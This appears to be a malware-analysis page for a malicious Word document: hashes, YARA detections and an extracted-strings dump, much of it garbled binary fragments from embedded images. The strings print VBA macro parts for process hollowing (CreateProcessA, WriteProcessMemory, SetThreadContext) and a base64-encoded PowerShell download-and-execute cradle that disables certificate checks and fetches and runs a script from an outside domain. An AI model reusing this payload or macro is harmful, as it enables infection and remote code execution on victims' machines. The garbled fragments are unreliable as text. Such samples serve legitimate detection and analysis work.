Sample details: a0567cb99e6ac9b17001c2a07e6f0ea4 --

Hashes
MD5: a0567cb99e6ac9b17001c2a07e6f0ea4
SHA1: 949966a12a0eb05175d2470e55d246655e4a8460
SHA256: 96718d85cc1c33f425a0a91001ed2bab069f78e79877776f3427c81a1c1432e3
SSDEEP: 6144:HajomTrfqhc0Z+lpqXqLIZDVwcF4BVYf6dVTz/gk9Mv:HajzCInqaLC3fyzT
Details
File Type: Composite
Added: 2019-06-18 13:31:41
Yara Hits
YRP/powershell | YRP/office_document_vba | YRP/Contains_VBA_macro_code | YRP/domain | YRP/url | YRP/contentis_base64 | YRP/maldoc_OLE_file_magic_number | YRP/Antivirus | YRP/WMI_strings | YRP/Misc_Suspicious_Strings | YRP/ThreadControl__Context | YRP/Big_Numbers1 | FlorianRoth/PowerShell_in_Word_Doc |
Strings
		http://ns.adobe.com/xap/1.0/
<?xpacket begin="
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmpMM:DocumentID="xmp.did:A57EFBB97A9011E99055857DF37FD589" xmpMM:InstanceID="xmp.iid:A57EFBB87A9011E99055857DF37FD589" xmp:CreatorTool="Microsoft
 Word 2010"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:702AFF777A8F11E9A3B0CBFAC86C5A22" stRef:documentID="xmp.did:702AFF787A8F11E9A3B0CBFAC86C5A22"/> <dc:creator> <rdf:Seq> <rdf:li>RedCrystal</rdf:li> </rdf:Seq> </dc:creator> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
HPhotoshop 3.0
P[y<~*
.f|OI`n
<nW'wi
3xc-3HUu
e!_]Xn
U@4RtP
7guf"d
8id1&B
UnP3Hd
fzO5gik
P{s{eh
azc/uo
'QIg.H
e'@/I^
bT.H.@
tfO+.;%$
|z~Rq#C
O%ge&N
5g23*0!
uUB<z/
tN,TjI
rD\/ROe%
$!@]A%	P
'egEfC
wwkgm-
+s)]Qdi
)31Iw.	n!
X/-t DN
+yn4	q%
VvvV3e
.aFUfM
M,W-en
#G7/EE
9s<-st
x#~dq4HQ\
Kki!x$
.-mnP%
;td#B("
P$R?6H
QA:qf:
;A*J#v
Ph-p]a
[Ce$Mvm
=KdrVI}
H	}woF<4
S^;{(!gzN
nr+,@l
F5y<DF>q
_{;(d"-
f7+#xx
K\OQcly
#Bh!'Et
(Ha_UTp
ON'Yl"e
vG!bu,
Aaygi{m%
{8&niNO
9-zrH#
TY[|SZ
AW?R\{K
J][Co=
kf7m*\
V{"[Y,
Pr3uwT\t
zh9kOy9,
6=7b1y&
(|73?4
$zjv#01(
$zjv#1
lz[\Ky
[RmRFfa2
,Tn!}:
Ko$q8Y
~d.c1E*
_WAVfg
U_Vr4:
Qn\\rK
^_KdT~nv3
]|[<bb}yx
]6_!z"cu8
ll^_+ssf
f.["Qu"
	]Cm%H:j5
http://ns.adobe.com/xap/1.0/
<?xpacket begin="
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmpMM:DocumentID="xmp.did:B4F834E27A9011E9949AF1162A4C9C2F" xmpMM:InstanceID="xmp.iid:B4F834E17A9011E9949AF1162A4C9C2F" xmp:CreatorTool="Microsoft
 Word 2010"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:799112E47A8F11E99855FB045EF1C463" stRef:documentID="xmp.did:799112E57A8F11E99855FB045EF1C463"/> <dc:creator> <rdf:Seq> <rdf:li>RedCrystal</rdf:li> </rdf:Seq> </dc:creator> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
HPhotoshop 3.0
br$53ct
F-QUk@.
{:jOWM
I.$EDTEMi
TD$^&q
omss2Cm
UUWDDD
+Mhk#?
1O$Od3
O	qa,'
"""&c9}:
g"j6>k
#Y?iQ:
f-lc}c
JWE+R9
FG3RG%
p5{2,K
h$G,OM
4D^&=h
|oz"A2
G>4j;]
iTOIu4
boynKv\
/ms	kl
DUG*hY
S<w>c1
U]UUzT
toN,z+\
1*3HfXVt
[Z"3; 
UDu4UN4Q
5z)U9ijjkji
kJ+[Wf
{Nk#kR
lp[:hel
uW1kDVbq
#seJ5W}$
#{qiii<
sYKTr[\
Mo*]$N
=[g.kl
v'TjoE
http://ns.adobe.com/xap/1.0/
<?xpacket begin="
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmpMM:DocumentID="xmp.did:9CF663487A9011E9BF56E5D98EA93E3D" xmpMM:InstanceID="xmp.iid:9CF663477A9011E9BF56E5D98EA93E3D" xmp:CreatorTool="Microsoft
 Word 2010"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:50825AD47A8F11E984DEEAD710724B79" stRef:documentID="xmp.did:50825AD57A8F11E984DEEAD710724B79"/> <dc:creator> <rdf:Seq> <rdf:li>RedCrystal</rdf:li> </rdf:Seq> </dc:creator> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
HPhotoshop 3.0
;Q@QQxv
z{),o~:
DkQ5UU
r*;j-*
+jDf8u>
O	qa,'
"""&c9}:
&"xqt\
^45m[V
XZIgkt
Lb*X9)XQ^
Lbw$N7=
f71118
D1]jZq
71[>_eU
ew<73C
bbq-%@
#b|s6dk
nDt7/z5
boznKv\
I$DUkU
tnTG"=
:basvXL>6
;gtn_R
f|9:jj
wqK^g{t]Q
vo_Rv|
\don---'
:E"&f8
bb&1$K
nrT	Wq
@lN`TDN
*{4P%4D
http://ns.adobe.com/xap/1.0/
<?xpacket begin="
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmpMM:DocumentID="xmp.did:4EBE15567A9011E9A92DED7F8434DB5A" xmpMM:InstanceID="xmp.iid:4EBE15557A9011E9A92DED7F8434DB5A" xmp:CreatorTool="Microsoft
 Word 2010"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0A10C9D37A8F11E99AF3EAE5AAECF930" stRef:documentID="xmp.did:0A10C9D47A8F11E99AF3EAE5AAECF930"/> <dc:creator> <rdf:Seq> <rdf:li>RedCrystal</rdf:li> </rdf:Seq> </dc:creator> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
HPhotoshop 3.0
^@cEEb
r?#1>	s
ZWdmEs
{msUdnYd
TsWEEM
O[f=#|
mS/qws{
[RvON"<c)j
g$y+Z[
T9jj^:
SZr3kZ
oY[{kg$
"""&c9}:
D;Ef5c3
f-lc}c
u&vY_,
jUUtCT
Lb*X9)XQ^
wkiBz4
$/r"9clh
eMM"f&cl3
f^=2/n
tk4i#{
h$G,OM
{ewcw-
G>4j;]
v"6m8m
/ms	kl
DUG*hY
w	,oDJ+
$Otr1Q
5EEMQPLdb
tnTG"=
3?n"9bs
6UkcY^
kJ+[Wf
68#z,j
}+jLbmZ
{,OOKb
#seJ5W}$
q4W3*#Z
DR>)Y,k
DW"q]{
iN`7p^
+Q@+Qk
http://ns.adobe.com/xap/1.0/
<?xpacket begin="
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmpMM:DocumentID="xmp.did:BC8891857A9011E9A628CD8921CB27F7" xmpMM:InstanceID="xmp.iid:BC8891847A9011E9A628CD8921CB27F7" xmp:CreatorTool="Microsoft
 Word 2010"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:452F9FE87A8F11E9955C883D124708A0" stRef:documentID="xmp.did:452F9FE97A8F11E9955C883D124708A0"/> <dc:creator> <rdf:Seq> <rdf:li>RedCrystal</rdf:li> </rdf:Seq> </dc:creator> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
HPhotoshop 3.0
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@A
                                                            
5Ayip\ 
G$r0>7
G#^c:^
sjxvPK
nwc26W"
syjo2WF
)kso}l
PX                                          
<L&18B
s]GTw4(-b
:I("73
{uFcyc
 :S',ja-
[Wmel.6
oKIi4#
G3[w$b
                               
GB"`ay
$                                
3[7>P--CM
-lY#\n"d
L@P& b
L@P& c
Cq]:gD
w\~!\}G
}Jw`.$k
edAue P
dQ2&pdm
h<x4P*
"f>9]+,
(=              
!R6&TmlW[
Xh@@@@@@@@A
        
(=              
OCK}U:
@@@@@@@@AG
MJ.[<O
,4         
YsfcNSDL
Y;73ck
         
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@A
      
k%iux89
P{H#[yN
\u0p$w=
.&2VG2WKH
J;vZ^\
O6&FjuT
?]"4e<
5GGjeuSJ
h<M40D
Xob1Ou
:h@Ake
<w-5sx
fB-Q:OM
(6                
MKA=r:
chckZ4
               
utU39j
,ZT7>K
VF[u$Q
a+#"W1
5uRk3/=
LL:Rb!+3
         
*54TTuT
T/Eg)i
@@@@@@@@A
        
>l7rmV<
@@@@@@@@@A
         
wn-i7-
@@@@@@@@AI
^dLqk]^
2	n-of0>
@@@@@@@@A
        
nybl|O
M.:'KqS3
P@@@@@@@@@@@@@@@@@@@@@@A
;w>vs cdi/o
5A	1n]
sKrPmC
@@@@@@@@A
        
$tq|Dhh->
q;[db7M
@@@@@@@@A
        
aGVQS(
@@@@@@@@A
lr:2/C
;+1lNQ
7O]KND
@@@@@@@@A
        
q1"(#2>
4TwEMuF
>s4HZIi
HjkWUL
         
P<B<*ok
P<B<*ok
P<B<*ok
P<B<*ok
@@@@@@@@A
        
opcHiq.=
sc}hKK
@@@@@@@@A
        
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@A
                                                            
+xnKne
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@A
      
      
                    
k[K[yr,
Yc|\n[ 'P.
?jgn7^=
s71.~(D
M==(>a
<<qkj;
Gm#ywq
@@@@@@@@@@@@@@@@@@A
        PR
                   
$RQ]ta
http://ns.adobe.com/xap/1.0/
<?xpacket begin="
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmpMM:DocumentID="xmp.did:9588DFF87A9011E98F05CBA840ADC280" xmpMM:InstanceID="xmp.iid:9588DFF77A9011E98F05CBA840ADC280" xmp:CreatorTool="Microsoft
 Word 2010"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:309CDD097A8F11E9BAE1FDC03B9EE600" stRef:documentID="xmp.did:309CDD0A7A8F11E9BAE1FDC03B9EE600"/> <dc:creator> <rdf:Seq> <rdf:li>RedCrystal</rdf:li> </rdf:Seq> </dc:creator> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
HPhotoshop 3.0
3"BRb4
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@AI
 C}e<'<
UPu[/U
:M1]@:
XHDt;?W
@ri5jm}
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@AI
FT1{yD
.-H\DX
KbEygc
*W[t n
lp9)wntr
|B@v!v
p&!gjtU
                   
@@@@@@@@A
sk+RX%
f/d-gGn
RM$@DE
W]:Pac
V7n4Ah
                                                            
q7nw^+t
EWr=4}fK
>zV0)v-w
JV0)v,
>zV0)v'#!
>zV0)v(
,              
cZ=8ty
,MVz;W
WO];(0
,              
'l?8	3
k:YwvE
~==h7c
,              
M^&=|TT
%(X@@@@@@@@@@@@@AI
*m85% 
,nr34LQ
:166fb
@@@@@@@@A
dDX8N6g}!0
        
&*3kfwrw
g0b)9m
!wb1&qgn
fw&fwfj
l@@@@@@@@A
9hp*?K
<Pby,|bDw1
w1jy|Pz
2@@@@@@@@A
u{7w]4
Tj5iVf
        
oZH&                   
                  
:_O[;t
,              
R1`Xhq
,              
,              
/L.c'#
,              
'l?7/d
{yJ	"p
mOGv}L
        
,              
F]G;q|R
F]G;r|N
TvwA.+
yyq8013
7ujy+Lvf[
u[S+os
      
d0B14#
8#)L9g#
Xx3pfn
        
!ipre1
_mWj=;
kbqaoB
EynW%8
6	o5?"
)H!{6f
@@@@@@@@A
{7kEm%
{WnEsiu
\t2FrG116
(%_aqw
)YYGnS
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@AI
        
.Y4/I9eJ
:r(LZ1
@@@@@@@@A
,sAe3^[Br
QiL;qvji
$@@@@@@@@@@A_
              
K[E+Tu7]:
<@@@@@@@@@@@@A_
              
ZM,WpZ
6-phcv
oeh1?2
Hr>:NT
%;v7v.
]=TS]=9e(
r3""p"~
!2"'rq
$fY7>hc
;;|[[8Ey
@@@@@@@@A
9[	Awl
1'&b#n.
v 'xop
Bf{j7j
bo-'=:&
RY[Mg70
VN+D5xm2
@@@@@@@@A
VN+D5xm2
l@@@@@@@@@@@@@@@@AY%
pY7>hc
      
ncpy"'	
6s)1Er
mr-su$
]ZOyik
Zy=<PE
#w<ROy
                                                            
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@AI
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
theme/theme/theme1.xml
w toc'v
3Vq%'#q
:\TZaG
Qg20pp
theme/theme/_rels/themeManager.xml.rels
K(M&$R(.1
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
$RQ]ta
RedCrystal
Normal.dotm
RedCrystal
Microsoft Office Word
<b:Sources SelectedStyle="\APA.XSL" StyleName="APA" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"></b:Sources>
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<ds:datastoreItem ds:itemID="{B2413A48-95DB-4846-8AE4-960CFBF85B4E}" xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml"><ds:schemaRefs><ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/></ds:schemaRefs></ds:datastoreItem>
Project
\G{00020
0046}#
2.0#0#C:
\Windows
\SysWOW6
e2.tlb
#OLE Aut
omation
ENormal
!Offic
DF8D04C-
5BFA-101@B-BDE5
ram File
s (x86)\@Common
Microsof
t Shared
\OFFICE1
RtlMoveMemory
GetModuleFileNameA
CreateProcessA
GetThreadContext
ReadProcessMemory
VirtualAllocEx
WriteProcessMemory
SetThreadContext
ResumeThread
TerminateProcess
RtlMoveMemory
GetModuleFileNameA
CreateProcessA
GetThreadContext
ReadProcessMemory
VirtualAllocEx
WriteProcessMemory
SetThreadContext
ResumeThread
TerminateProcess
[+] |__ Applied context to the new thread
UwBlAHQALQBBAGwAaQBhAHMAIABzAHcAIAAtAFYAYQBsAHUAZQAgACIASQBuAFYAbwBrAGUALQBlAFgAcAByAGUAUwBzAEkAbwBuACIAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AG'
kAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQByAHYAZQByAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBWAGEAbABpAGQAYQB0AGkAbwBuAEMAYQBsAGwAYgBhAGMAawAgAD0AIAB7'
ACAAJAB0AHIAdQBlACAAfQA7ACAAJABiAGMAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACAAJABiAGMALgBDAHIAZQ'
BkAGUAbgB0AGkAYQBsAHMAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAKAAnAGEAdQB0AGgA'
JwAsACAAJwAhACkAJgAlAEcAYQBvAGwAVABdAEgAfABwAEoATwBqAGUATgBjAHsAbQBTADcANABfAC0AWABkAFIAWgBZAH0AJwApADsAcwBsAGUAZQBwACAAKABHAGUAdAAtAFIAYQBuAGQAbwBtAC'
AAIAAtAE0AYQB4ACAAMQA1ADAAKQA7ACQAZABzAD0AJABiAGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGEAYwBrAHUAcABhAGMAYwBvAHUAbgB0'
AC4AbgBlAHQALwB1AHIAbAAvAHYAaQBlAHcAJwApADsAcwBsAGUAZQBwACAAMgAwADAAOwBzAHcAIAAkAGQAcwA='
winmgmts:{impersonationLevel=impersonate}!\\ 
\root\cimv2
Select * from Win32_Process  WHERE Name = "WINWORD.EXE" AND CommandLine Like "%win%" 
Attribut
e VB_Nam
e = "Thi
sDocumen
1Normal
VGlobal!
Pre decla
lateDeri
$Custom
 Win64 T@hen
rSafe Su
b RtlMov
eMemory 
Lib "KER
NEL32" (
ByVal lD@estina
6A@s Long
lLength
1GetModu
leFile
Alias "
H+lp-A
E2nSizeF+
eProce>s
G+lpxApp
pCommand
	bInh@
Environ
!R!Curr
Di0rect
StartupI
TUPINFO,
{ERPRO CESS_
ATION)E
#Contex
CONTEXT
^Readd8]
AXddr!P@
pBufferP
9Number
OfBytes!
Vi@:al
AllocExU+
qBjTyp
@:_FBFWri
itCodB&I
OwOwOw`tOw
o-o-j-
?&?&1&Op
pnd If
IMAGE_NU
MBEROF_D
IRECTORY
_ENTRIE'
S = 16
Private 
Const IM
AGE_SIZE
OF_SHORT
MAXIMUM_
EXTENSIObN
80387_R
EGISTER
f Win64 
Type M1
 As LongC
DOS_@HEADER
)e@_magic
)I@nteger
"@parhdr
$m@inallo
KhsumQ
7ovnoQ
res(4 - 
oemid	
IRECTORY
}Virtual8Add
Machin
Number
OfSecti
ETimeD
rToSymb
olTabl
alHeade
Characte
ristic"
orLinker0Vers
a8`OfCod
Initialu`=d`.a
EAlignme
*Operati
ngSystem
@Sub>s
ValuwB
DllYnA
ckReserv
Etack`Commiv"o
IRvaA,nd
7DiBr .ory(
[N`UMBER@
ENTRIESGa
] #Els
0$k?F6@
/G/G/G
/G/G/G
S }atur
ecName
ROCESS_I
NFORMAQ
hProce
rocessId
 As Long
Private
 STARTUP
lpReservBe
pDesktop
ountChar
FillA2t
&wShow@Window
nteger
hStdInpuFt
E0rror
OATING_S
AVE_AREA
C-Control
OffseF1
Select
egisterA
(SIZE_O
F_80387_
REGISTER@S - 1)
Sparde0
C@ONTEXT
If @z64 T8hen
Drf?k4D
cLegacy
Vbiee(26
LastBra
nchToRo&!
Except
	#Elsds@
FloatSa
4s(MAX
IMUM_SUP
PORTED_
ENSION
t MEM_CO
MMIT = &
RESERVE
ADWRITc
SUSPEND
_FUlLL
DOS_SI@GNATURS
E_MACHIN@E_I386
ublic F(uncQZ 1/Ar
rayLengt
ngth = U
Bound(ba
Bytes) -
End Func@tion
P@rivate
ArrayTo@String
(p) As
Dim s`trRes
&Integ
@= 0 To
K& Chr
FilheTo
= 0Free
Op<enAMA
nary Acc
ess Read}A
 Space(A
^Get qC
bFromUni
on AA'A
, bChar
.gkjfs
gksjkaso
iopfajv"_
ublic Su
b sgsdkj
lkadn	
'DbiArgume|ntH
K@*u@ctDOSH
8IMAGE_@
_HEADER
Long Ptr: 
= xVar
all RtlM
oveMemor
0)), 64
}!3ja@g
IGNATURE
lfanew
SIZEOF_
gnature
Win647
.M achin
LE_MACHI
NE_I386
(02G9|
Inf`ormat
ROCESS_I
NFORMATI
bpF`, $0&3
CREATE_S
USPENDED
btTerm
sMemory 
= ReadPr
ormation
L, lIm
ageBaseA@ddrLoc
IZEOF_AD
DRESS, 0
'Call 
Terminat
DExi t Sub
	nd If
e As Lon0gPtr
VirtualA
llocEx
SizeOf
, MEM_CO
MMIT +
ERVE, PA
GE_EXECU
TE_READW0RITEHe
6eWriF
dFor j
o 1999
@Next j
(0)), bn
d@iCount!cI
ntege$cA
SECTION_
Xon1Fil
.Numbe
e_l`fanew
3String:
= Byte
ArrayToc
!	D/a&
i`krTo
(vRX#-
x t.Rdx@
[+] |__ 
Applied 
@ to th
ResumeS
nt_close
A'gkjfs
gksjkaso
iopfajvdg
`oolea
jgj8ksv!
+ Chr(6
ksjjgjks
v = Fkjh
+ Chr(
9,^5*/92
*.83*.12
5+/50j/
Dim HJ
NLksdjb
ajklvnh
o	o	i	
%aNzXHdj
wBlAHQAL
QBBAGwAa
QBhAHMAI@ABzAHcp
tAFYAYQB
sAHUAZQA
gACIASQB
bwBrAG
lAFgAc
bAFMAeQq
BtAC4ADTg
gB2AG"#bA
pAG4Ad
ABNAGEAb
yAF@0AOgA6q
AYwBhAHQ
AZQBWAGE
AbABpAGQ
AYQB0AGk
AbwBuAEM
<sAGwAYg
BhAGMAaw
AgAD0AIA@B7"
Hdj2 = "@ACAAJA
~H@IAdQBl
~IA$A9
ALQBvAGILAa
_F@MAeQBz
t AC4AT
LgBXAGU
dAB3AG8A
wAK8AAn
wAhACkAJ
gAlAEcA
wAVABdA
EgAfABwA
EoATwBq
jAHsAbQ
BTADcANA
BfAC0AWA
{FIAWgBZ
pAD sAcwB
aH)5A)A
MPtAE0
QA1ADAAK
)A6A@C8ALwB
rAHUAcA
CMgAwy
sdjbjksv
ajklvnh
kjfsgksj
kasoiopf
	Dim st
rCompute
jWMIServ ice, 
ocess, c
As IntegTer
Dir(Fkjh
jg@.v)!
ToByteAr
l sgsdkj
Gajhabv
lkadnI
H4For 
I  To 2G
bject("w
inmgmts:
{imperso
nationLe
e}!`\\" &	h
\root\ci
Jh.ExecQu
ery("Sel
 * from
 Win32_$j
  WHERE 
INWORD.E
XE`bAND `y
mandLine
 Like "":% 
a#Ea|chHw
@P@rivate
A  Docump1_o8pen
cQMShap
In Acti
ntrast
 >= 0.50
ghtn [
RtlMoveMemory
GetModuleFileNameA
CreateProcessA
GetThreadContext
ReadProcessMemory
VirtualAllocEx
WriteProcessMemory
SetThreadContext
ResumeThread
TerminateProcess
RtlMoveMemory
GetModuleFileNameA
CreateProcessA
GetThreadContext
ReadProcessMemory
VirtualAllocEx
WriteProcessMemory
SetThreadContext
ResumeThread
TerminateProcess
 ================================================================================
                      ~~~ IMPORT WINDOWS API FUNCTIONS ~~~
 ================================================================================
 ================================================================================
                           ~~~ WINDOWS STRUCTURES ~~~
 ================================================================================
 Constants used in structure definitions
ULONGLONG Low;
LONGLONG High;
 https://www.nirsoft.net/kernel_struct/vista/IMAGE_DOS_HEADER.html
WORD e_magic;
WORD e_cblp;
WORD e_cp;^
WORD e_crlc;
WORD e_cparhdr;
WORD e_minalloc;
WORD e_maxalloc;
WORD e_ss;^
WORD e_sp;^
WORD e_csum;
WORD e_ip;^
WORD e_cs;^
WORD e_lfarlc;
WORD e_ovno;
WORD e_res[4];^
WORD e_oemid;
WORD e_oeminfo;
WORD e_res2[10];
LONG e_lfanew;
 https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680305(v=vs.85).aspx
DWORD   VirtualAddress;
DWORD   Size;
 https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680313(v=vs.85).aspx
WORD    Machine;
WORD    NumberOfSections;
DWORD   TimeDateStamp;
DWORD   PointerToSymbolTable;
DWORD   NumberOfSymbols;
WORD    SizeOfOptionalHeader;
WORD    Characteristics;
 https://msdn.microsoft.com/en-us/library/windows/desktop/ms680339(v=vs.85).aspx
WORD        Magic;^
BYTE        MajorLinkerVersion;
BYTE        MinorLinkerVersion;
DWORD       SizeOfCode;
DWORD       SizeOfInitializedData;^
DWORD       SizeOfUninitializedData;
DWORD       AddressOfEntryPoint;
DWORD       BaseOfCode;
ULONGLONG   ImageBase;
DWORD       SectionAlignment;
DWORD       FileAlignment;^
WORD        MajorOperatingSystemVersion;
WORD        MinorOperatingSystemVersion;
WORD        MajorImageVersion;
WORD        MinorImageVersion;
WORD        MajorSubsystemVersion;^
WORD        MinorSubsystemVersion;^
DWORD       Win32VersionValue;
DWORD       SizeOfImage;
DWORD       SizeOfHeaders;^
DWORD       CheckSum;
WORD        Subsystem;
WORD        DllCharacteristics;
ULONGLONG   SizeOfStackReserve;
ULONGLONG   SizeOfStackCommit;
ULONGLONG   SizeOfHeapReserve;
ULONGLONG   SizeOfHeapCommit;
DWORD       LoaderFlags;
DWORD       NumberOfRvaAndSizes;
IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
WORD    Magic;
BYTE    MajorLinkerVersion;
BYTE    MinorLinkerVersion;
DWORD   SizeOfCode;
DWORD   SizeOfInitializedData;
DWORD   SizeOfUninitializedData;
DWORD   AddressOfEntryPoint;
DWORD   BaseOfCode;
DWORD   BaseOfData;
DWORD   ImageBase;^
DWORD   SectionAlignment;
DWORD   FileAlignment;
WORD    MajorOperatingSystemVersion;
WORD    MinorOperatingSystemVersion;
WORD    MajorImageVersion;^
WORD    MinorImageVersion;^
WORD    MajorSubsystemVersion;
WORD    MinorSubsystemVersion;
DWORD   Win32VersionValue;^
DWORD   SizeOfImage;
DWORD   SizeOfHeaders;
DWORD   CheckSum;
WORD    Subsystem;^
WORD    DllCharacteristics;
DWORD   SizeOfStackReserve;
DWORD   SizeOfStackCommit;^
DWORD   SizeOfHeapReserve;^
DWORD   SizeOfHeapCommit;
DWORD   LoaderFlags;
DWORD   NumberOfRvaAndSizes;
IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
 https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680336(v=vs.85).aspx
DWORD Signature;
IMAGE_FILE_HEADER FileHeader;
IMAGE_OPTIONAL_HEADER OptionalHeader;
 https://www.nirsoft.net/kernel_struct/vista/IMAGE_SECTION_HEADER.html
UCHAR Name[IMAGE_SIZEOF_SHORT_NAME];
ULONG Misc;
ULONG VirtualAddress;
ULONG SizeOfRawData;
ULONG PointerToRawData;
ULONG PointerToRelocations;
ULONG PointerToLinenumbers;
WORD NumberOfRelocations;
WORD NumberOfLinenumbers;
ULONG Characteristics;
 https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms684873(v=vs.85).aspx
HANDLE hProcess;
HANDLE hThread;
DWORD dwProcessId;^
DWORD dwThreadId;
 https://msdn.microsoft.com/en-us/library/windows/desktop/ms686331(v=vs.85).aspx
DWORD   cb;
LPSTR   lpReserved;
